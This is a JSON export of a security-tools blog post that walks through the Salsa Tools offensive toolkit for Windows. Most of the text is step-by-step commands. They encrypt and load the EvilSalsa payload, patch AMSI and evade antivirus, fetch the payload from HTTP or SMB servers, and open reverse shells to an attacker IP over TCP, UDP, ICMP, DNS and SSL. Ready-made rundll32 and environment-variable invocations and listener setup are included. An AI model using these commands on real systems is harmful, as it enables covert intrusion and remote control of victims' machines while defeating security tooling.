{"id":5353,"date":"2019-06-15T17:45:24","date_gmt":"2019-06-15T12:15:24","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=5353"},"modified":"2019-06-15T17:45:24","modified_gmt":"2019-06-15T12:15:24","slug":"salsa-tools-shellreverse","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/","title":{"rendered":"Salsa Tools : ShellReverse TCP\/UDP\/ICMP\/DNS\/SSL\/BINDTCP &#038; AV Bypass, AMSI Patched"},"content":{"rendered":"\n<p> Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for it&#8217;s execution. <\/p>\n\n\n\n<p>In order to avoid the latest detection techniques (AMSI), most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk \u201c Inmersi\u00f3n en la explotaci\u00f3n tiene rima \u201d which took place during h-c0n in 9th February 2019. <\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Features<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>TCP\/UDP\/ICMP\/DNS\/BIND\/SSL     <\/li><li>AV Safe (17th February)<\/li><li>AMSI Patchers<\/li><li>PowerShell execution <\/li><\/ul>\n\n\n\n<p><strong>Also Read  &#8211; <a href=\"https:\/\/kalilinuxtutorials.com\/whatweb-next-generation-web-scanner\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"WhatWeb : Next Generation Web Scanner (opens in a new tab)\">WhatWeb : Next Generation Web Scanner<\/a><\/strong><\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Setup<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#requirements\"><\/a><strong>Requirements<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Visual Studio 2017 (or similar)<\/li><li>Python 2.7<\/li><\/ul>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#running-la-salsa\"><\/a><strong>Running la Salsa<\/strong><\/p>\n\n\n\n<p>EvilSalsa is the key ingredient of this recipe. It contains the payload, which is executed on the system as it follows: as soon as the payloads starts, it runs&nbsp;<code><strong>System.Management.Automation.dll<\/strong><\/code>&nbsp;which creates a runspace . <\/p>\n\n\n\n<p>Within that runspace we have four types of shells (TCP \/ UDP \/ ICMP \/ DNS \/ BINDTCP). Once EvilSalsa is loaded, first thing first, the existence of&nbsp;<code><strong>c:\\windows\\system32\\amsi.dll<\/strong><\/code>&nbsp;is checked. If it exists, it is patched using a home-cooked variant of CyberArk and Rastamouse bypasses.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#mixing-encrypterassembly-and-evilsalsa\"><\/a><strong>Mixing EncrypterAssembly and Evilsalsa<\/strong><\/p>\n\n\n\n<p>EncrypterAssembly can be used as a Python script or as a Exe binary. It encrypts the previously generated EvilSalsa.<\/p>\n\n\n\n<p>Python usage:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>python encrypterassembly.py <\/strong><file><strong> <\/strong><password><strong> <\/strong><\/password><\/file><\/p>\n\n\n\n<p>Executable usage:<\/p>\n\n\n\n<p style=\"text-align:left\" class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>Encrypterassembly.exe <\/strong><file><strong> <\/strong><password><strong> <\/strong><\/password><\/file><\/p>\n\n\n\n<p><strong>Bringing the Encrypted EvilSalsa to the table with SalseoLoader<\/strong><\/p>\n\n\n\n<p>SalseoLoader is in charge of loading the encrypted payload. Can be both compiled as a library or as an executable. If it is run as an executable, the chosen arguments must be provided when the executable is run.<\/p>\n\n\n\n<p> If it is compiled as a library, the descriptor &#8220;main&#8221; must be exported. Arguments are added using environmental variables.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>Usage:<br><\/strong><br>&#8211; SalseoLoader.exe password http:\/\/webserver.com\/elfuckingmal.txt ReverseTCP LHOST LPORT<br> &#8211; SalseoLoader.exe password \\smbserver.com\\evil\\elfuckingmal.txt ReverseUDP LHOST LPORT<br> &#8211; SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseICMP LHOST<br>&#8211; SalseoLoader.exe password http:\/\/webserver.com\/elfuckingmal.txt ReverseDNS LHOST ServerDNS<br>&#8211; SalseoLoader.exe password http:\/\/webserver.com\/elfuckingmal.txt BindTCP LHOST LPORT<br>&#8211; SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseSSL LHOST LPORT<br>&#8211; SalseoLoader.exe password http:\/\/webserver.com\/shellcode.txt shellcode<br><br><strong>Shells Availables:<br><\/strong><br>&#8211; ReverseTCP<br>&#8211; ReverseDNS<br>&#8211; ReverseSSL<br>&#8211; Shellcode<br>&#8211; ReverseUDP<br>&#8211; ReverseICMP<br>&#8211; BindTCP<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Tutorial<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#compiling-the-binaries\"><\/a><strong>Compiling the binaries<\/strong><\/p>\n\n\n\n<p>Download the source code from the github and compile&nbsp;<strong>EvilSalsa<\/strong>&nbsp;and&nbsp;<strong>SalseoLoader<\/strong>. You will need&nbsp;<strong>Visual Studio<\/strong>&nbsp;installed to compile the code.<\/p>\n\n\n\n<p>Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).<\/p>\n\n\n\n<p>You can&nbsp;<strong>select the architecture<\/strong>&nbsp;inside Visual Studio in the&nbsp;<strong>left &#8220;Build&#8221; Tab in &#8220;Platform Target&#8221;<\/strong>.<\/p>\n\n\n\n<p>(If you can&#8217;t find this options press in &#8220;<strong>Project Tab<\/strong>&#8221; and then in &#8220;<strong>&nbsp;Properties<\/strong>&#8220;)<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-uKCItRuHV8Y\/XQPXjnGXu1I\/AAAAAAAAAzQ\/Uebvrtox1GwRi30LPVHlm1nsn-p7oSVTQCLcBGAs\/s1600\/Tutorial-1.png\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p>Then, build both projects (Build -&gt; Build Solution) (Inside the logs will appear the path of the executable):<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-ubipSpWAX_M\/XQPXjqSvJQI\/AAAAAAAAAzM\/U4RTFQfWPiE1MhiVYf0mnJhlLZTa3QpRQCLcBGAs\/s1600\/Tutorial-2.png\" alt=\"\"\/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Prepare the Backdoor<\/strong><\/p>\n\n\n\n<p>First of all, you will need to encode the&nbsp;<strong>EvilSalsa.dll<\/strong>. To do so, you can use the python script&nbsp;<strong>encrypterassembly.py<\/strong>&nbsp;or you can compile the project&nbsp;<strong>EncrypterAssembly<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#python\"><\/a><strong>Python<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">python EncrypterAssembly\/encrypterassembly.py &lt;FILE&gt; &lt;PASSWORD&gt; &lt;OUTPUT_FILE&gt; <br>python EncrypterAssembly\/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#windows\"><\/a><strong>Windows<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">EncrypterAssembly.exe <file> <password> <output_file> <\/output_file><\/password><\/file><br><file><password><output_file>EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt<\/output_file><\/password><\/file><\/p>\n\n\n\n<p>Ok, now you have everything you need to execute all the Salseo thing: the&nbsp;<strong>encoded EvilDalsa.dll<\/strong>&nbsp;and the&nbsp;<strong>binary of SalseoLoader<\/strong>.&nbsp;<strong>Upload the SalseoLoader.exe binary to the machine. It shouldn&#8217;t be detected by any AV&#8230;<\/strong><\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#execute-the-backdoor\"><\/a><strong>Execute the backdoor<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#getting-a-tcp-reverse-shell-downloading-encoded-dll-through-http\"><\/a><strong>Getting a TCP reverse shell (downloading encoded dll through HTTP)<\/strong><\/p>\n\n\n\n<p>Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa.<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>SalseoLoader.exe password http:\/\/\/evilsalsa.dll.txt reversetcp   &lt;Attacker-IP&gt;  &lt;Port&gt;<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#getting-a-udp-reverse-shell-downloading-encoded-dll-through-smb\"><\/a><strong>Getting a UDP reverse shell (downloading encoded dll through SMB)<\/strong><\/p>\n\n\n\n<p>Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>SalseoLoader.exe password \\\/folder\/evilsalsa.dll.txt reverseudp  &lt;Attacker-IP&gt;  &lt;Port&gt; <\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#getting-a-tcp-reverse-shell-ssl-using-local-file\"><\/a><strong>Getting a TCP reverse shell SSL (using local file)<\/strong><\/p>\n\n\n\n<p><strong>Set the listener inside the attacker machine:<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes <br>openssl s_server -key key.pem -cert cert.pem -port <\/strong><port><strong> -tls1<\/strong><\/port><\/p>\n\n\n\n<p><strong>Execute the backdoor:<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>SalseoLoader.exe password C:\/path\/to\/evilsalsa.dll.txt ReverseSSL  &lt;Attacker-IP&gt;  &lt;Port&gt;  <\/strong><attacker-ip><strong> <\/strong><port><strong> <\/strong><\/port><\/attacker-ip><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#getting-a-icmp-reverse-shell-encoded-dll-already-inside-the-victim\"><\/a><strong>Getting a ICMP reverse shell (encoded dll already inside the victim)<\/strong><\/p>\n\n\n\n<p><strong>This time you need a special tool in the client to receive the reverse shell. Download: [<a href=\"https:\/\/github.com\/inquisb\/icmpsh\">https:\/\/github.com\/inquisb\/icmpsh<\/a>]<\/strong><\/p>\n\n\n\n<p><strong>Disable ICMP Replies:<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>#You finish, you can enable it again running: <br>sysctl -w net.ipv4.icmp_echo_ignore_all=0<\/strong><\/p>\n\n\n\n<p><strong>Execute the client:<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>python icmpsh_m.py &#8220;&lt;Attacker-IP&gt;&#8221; &#8220;&lt;Victm-IP&gt;&#8221;<\/strong><\/p>\n\n\n\n<p><strong>Inside the victim, lets execute the salseo thing:<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>SalseoLoader.exe password C:\/Path\/to\/evilsalsa.dll.txt reverseicmp  &lt;Attacker-IP&gt; <\/strong><\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#compiling-salseoloader-as-dll-exporting-main-function\"><\/a><strong>Compiling SalseoLoader as DLL exporting main function<\/strong><\/p>\n\n\n\n<p>Open the SalseoLoader project using Visual Studio.<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#add-before-the-main-function-dllexport\"><\/a><strong>Add before the main function: [DllExport]<\/strong><\/p>\n\n\n\n<p>Before the main function add this line: [DllExport]<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-SN_rxYLkGTY\/XQPcC9KTYqI\/AAAAAAAAAzk\/4zRvgEm1KOsA7Z_5D-_fzKSAvULYTJnogCLcBGAs\/s1600\/DLL-1.png\" alt=\"\"\/><\/figure>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Install DllExport for this project<\/strong><\/p>\n\n\n\n<p style=\"text-align:left\">Tools &#8211;&gt; NuGet Package Manager &#8211;&gt; Manage NuGet Packages for Solution&#8230;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-vhcNJx_2Aj8\/XQPcCyHHGsI\/AAAAAAAAAzs\/5a9KXnPbqk8wuZ7fVZfzyaQPMXRrvsIhQCLcBGAs\/s1600\/DLL-2.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Search for DllExport package (using Browse tab), and press Install (and accept the popup)<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-7LNLH5aQXjE\/XQPcCzZBzBI\/AAAAAAAAAzo\/cPEdYO5jsmMQcw7c7NEyNU65ZhhBQlI3gCLcBGAs\/s1600\/DLL-3.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>In your project folder have appeared the files:&nbsp;<strong>DllExport.bat<\/strong>&nbsp;and&nbsp;<strong>DllExport_Configure.bat<\/strong><\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#uninstall-dllexport\"><\/a><strong>Uninstall DllExport<\/strong><\/p>\n\n\n\n<p>Press&nbsp;<strong>Uninstall<\/strong>&nbsp;(yeah, its weird but trust me, it is necessary)<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-uXPYgJA78o8\/XQPcD6pKRiI\/AAAAAAAAAzw\/wshjiN7K7Dc-FLVQp6AzpLy2rgyk99huACLcBGAs\/s1600\/DLL-4.png\" alt=\"\"\/><\/figure>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Exit Visual Studio and execute DllExport_configure<\/strong><\/p>\n\n\n\n<p>Just&nbsp;<strong>exit<\/strong>&nbsp;Visual Studio<\/p>\n\n\n\n<p>Then, go to your&nbsp;<strong>SalseoLoader folder<\/strong>&nbsp;and&nbsp;<strong>execute DllExport_Configure.bat<\/strong>&nbsp;Select&nbsp;<strong>x64<\/strong>&nbsp;(if you are going to use it inside a x64 box, that was my case), select&nbsp;<strong>System.Runtime.InteropServices<\/strong>&nbsp;(inside&nbsp;<strong>Namespace for DllExport<\/strong>) and press&nbsp;<strong>Apply<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-3iyosfUMwRQ\/XQPc3QcKdgI\/AAAAAAAAA0Q\/e3oiM4SPq2Yo2zLfGXHmT1urVrPmVffHgCLcBGAs\/s1600\/Visual%2BStudio-2.png\" alt=\"\"\/><\/figure>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Open the project again with visual Studio<\/strong><\/p>\n\n\n\n<p><strong>[DllExport]<\/strong>&nbsp;should not be longer marked as error<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-3SxBDIk7J4Q\/XQPc3dT215I\/AAAAAAAAA0I\/Q7IHm8DZNpwvK2ALi3GOHhEUDEk5Chu4ACLcBGAs\/s1600\/Visual%2BStudio-3.png\" alt=\"\"\/><\/figure>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><strong>Build the solution<\/strong><\/p>\n\n\n\n<p>Select&nbsp;<strong>Output Type = Class Library<\/strong>&nbsp;(Project &#8211;&gt; SalseoLoader Properties &#8211;&gt; Application &#8211;&gt; Output type = Class Library)<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-pUl4HW_TDWc\/XQPc4VZdPdI\/AAAAAAAAA0U\/YEzsSSoDANAmeUUzW2FX8dwnrqkQC7rLQCLcBGAs\/s1600\/Visual%2BStudio-4.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>Select&nbsp;<strong>x64 platform<\/strong>&nbsp;(Project &#8211;&gt; SalseoLoader Properties &#8211;&gt; Build &#8211;&gt; Platform target = x64)<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/1.bp.blogspot.com\/-Rd7YgXLLadw\/XQPc4h8gv4I\/AAAAAAAAA0Y\/SePEFl3aNOk9fNU6sEs4EPju4EcicJIHwCLcBGAs\/s1600\/Visual%2BStudio-5.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>To&nbsp;<strong>build<\/strong>&nbsp;the solution: Build &#8211;&gt; Build Solution (Inside the Output console the path of the new DLL will appear)<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#test-the-generated-dll\"><\/a><strong>Test the generated Dll<\/strong><\/p>\n\n\n\n<p>Copy and paste the Dll where you want to test it.<\/p>\n\n\n\n<p>Execute:<\/p>\n\n\n\n<p><code>rundll32.exe SalseoLoader.dll,main<\/code><\/p>\n\n\n\n<p>If not error appears, probably you have a functional dll!!<\/p>\n\n\n\n<p style=\"text-align:center\" class=\"has-background has-light-green-cyan-background-color\"><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#get-a-shell-using-the-dll\"><\/a><strong>Get a shell using the Dll<\/strong><\/p>\n\n\n\n<p>Don&#8217;t forget to use a&nbsp;<strong>HTTP server and set a nc listener<\/strong><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools#powershell\"><\/a><strong>Powershell<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>$env:pass=&#8221;password&#8221;<br>$env:payload=&#8221;http:\/\/10.2.0.5\/evilsalsax64.dll.txt&#8221;<br>$env:lhost=&#8221;10.2.0.5&#8243;<br>$env:lport=&#8221;1337&#8243;<br>$env:shell=&#8221;reversetcp&#8221;<br>rundll32.exe SalseoLoader.dll,main<\/strong><\/p>\n\n\n\n<p><strong>CMD<\/strong><\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>set pass=password<br>set payload=http:\/\/10.2.0.5\/evilsalsax64.dll.txt<br>set lhost=10.2.0.5<br>set lport=1337<br>set shell=reversetcp<br>rundll32.exe SalseoLoader.dll,main<\/strong><\/p>\n\n\n\n<div class=\"wp-block-button aligncenter is-style-squared\"><a class=\"wp-block-button__link has-background has-vivid-cyan-blue-background-color\" href=\"https:\/\/github.com\/Hackplayers\/Salsa-tools\"><strong>Download<\/strong><\/a><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for it&#8217;s execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written on C#. Salsa Tools was publicly released by [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":15608,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png","fifu_image_alt":"Salsa Tools : ShellReverse TCP\/UDP\/ICMP\/DNS\/SSL\/BINDTCP & AV Bypass, AMSI Patched","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[142,303,376,891,1578,2923,3081,3232,3451],"class_list":["post-5353","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-amsi","tag-av-bypass","tag-bind-tcp","tag-dns","tag-icmp","tag-salsa-tools","tag-shellreverse-tcp","tag-ssl","tag-udp"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Salsa Tools : ShellReverse TCP\/UDP\/ICMP\/DNS\/SSL\/BINDTCP<\/title>\n<meta name=\"description\" content=\"Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Salsa Tools : ShellReverse TCP\/UDP\/ICMP\/DNS\/SSL\/BINDTCP\" \/>\n<meta property=\"og:description\" content=\"Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2019-06-15T12:15:24+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Salsa Tools : ShellReverse TCP\/UDP\/ICMP\/DNS\/SSL\/BINDTCP &#038; AV Bypass, AMSI Patched\",\"datePublished\":\"2019-06-15T12:15:24+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/\"},\"wordCount\":1169,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png\",\"keywords\":[\"AMSI\",\"AV Bypass\",\"BIND TCP\",\"dns\",\"ICMP\",\"Salsa Tools\",\"ShellReverse TCP\",\"ssl\",\"UDP\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/\",\"name\":\"Salsa Tools : ShellReverse TCP\/UDP\/ICMP\/DNS\/SSL\/BINDTCP\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png\",\"datePublished\":\"2019-06-15T12:15:24+00:00\",\"description\":\"Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/salsa-tools-shellreverse\/#primaryimage\",\"url\":\"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png\",\"contentUrl\":\"https:\/\/1.bp.blogspot.com\/-pJmwN3-VnT4\/XQPfwQVGGnI\/AAAAAAAAA00\/JnXx99f2t-kEEYRcuxRy6CC2ahoL6xHfACLcBGAs\/s1600\/DLL-1%25281%2529.png\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Salsa Tools : ShellReverse TCP\/UDP\/ICMP\/DNS\/SSL\/BINDTCP","description":"Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows 